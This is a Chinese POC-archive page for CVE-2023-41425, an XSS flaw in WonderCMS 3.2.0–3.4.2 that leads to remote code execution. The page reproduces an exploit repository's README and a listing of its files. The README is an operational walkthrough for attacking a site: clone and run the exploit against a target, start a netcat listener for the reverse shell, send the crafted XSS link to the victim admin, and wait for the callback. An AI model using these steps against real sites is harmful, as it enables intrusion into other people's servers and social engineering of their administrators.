POC详情: dbdcfceeef054fbcd67aab7ca2288a113696d8b5

来源
关联漏洞
标题: WonderCMS 安全漏洞 (CVE-2023-41425)
描述:WonderCMS是一套基于PHP的开源内容管理系统(CMS)。 WonderCMS v.3.2.0版本至v.3.4.2版本存在安全漏洞。攻击者利用该漏洞通过上传到installModule组件的特制脚本执行任意代码。
描述
Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.
介绍
# CVE-2023-41425-wonderCMS_RCE
Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component. *For educational purposes only*

Requires knowledge of loginURL, admin access or the ability to get the admin to click the XSS link.
1. Clone the repo
```bash
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
```
2. Run it
```bash
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
```
3. Set up a local listener
```bash
nc -lnvp 9001
```
4. Send the printed xss URL to the victim or if you have admin access click it
5. Wait for a callback

![image](https://github.com/user-attachments/assets/9d5dea86-576e-46cb-95fc-b0e23df59adc)

文件快照

[4.0K] /data/pocs/dbdcfceeef054fbcd67aab7ca2288a113696d8b5 ├── [3.6K] CVE-2023-41425.py ├── [1.0K] LICENSE ├── [ 906] README.md └── [4.0K] shell └── [ 17] shell.php 1 directory, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。